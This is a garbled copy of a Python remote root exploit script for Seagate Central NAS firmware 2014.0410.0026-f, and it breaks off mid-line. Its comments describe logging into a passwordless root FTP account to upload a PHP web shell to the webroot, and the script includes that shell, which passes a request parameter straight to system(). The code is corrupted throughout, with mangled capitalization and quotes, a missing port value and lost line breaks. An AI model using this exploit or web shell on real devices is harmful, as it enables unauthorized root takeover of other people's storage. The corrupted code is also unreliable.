Seagate 2014.0410.0026-f Remote Root Exploit

#!/usr/bin/python # seagate_ftp_remote_root.py # seagate remote Root exploit # Jeremy Brown [Jbrown3264/gmail]
# May 2015 # #-synopsis-# # Seagate-by-default has a passwordless root account (and no option to change it).
# One way to exploit it's to log into it's FTP server and upload a php shell to the Webroot.
# From there, we can execute commands with root privileges as LIGHTTPD is also running as root.
# #-fixes-# # Seagate scheduled it ' s updates to go live on April 28th, 2015. # # tested Firmware version:2014.0410.0026-f # import sys from ftplib import FTP port = Php_shell = "" "<?php If
(Isset ($_request[' cmd '))
    {$cmd = ($_request["cmd"]);
    echo "<pre> $cmd </pre>";
System ($CMD); }?> "" "Php_shell_filename =" shell.php "seagate_central_webroot ="/cirrus/"def Main (): if (len (SYS.ARGV) < 2): Print ("Usage:%s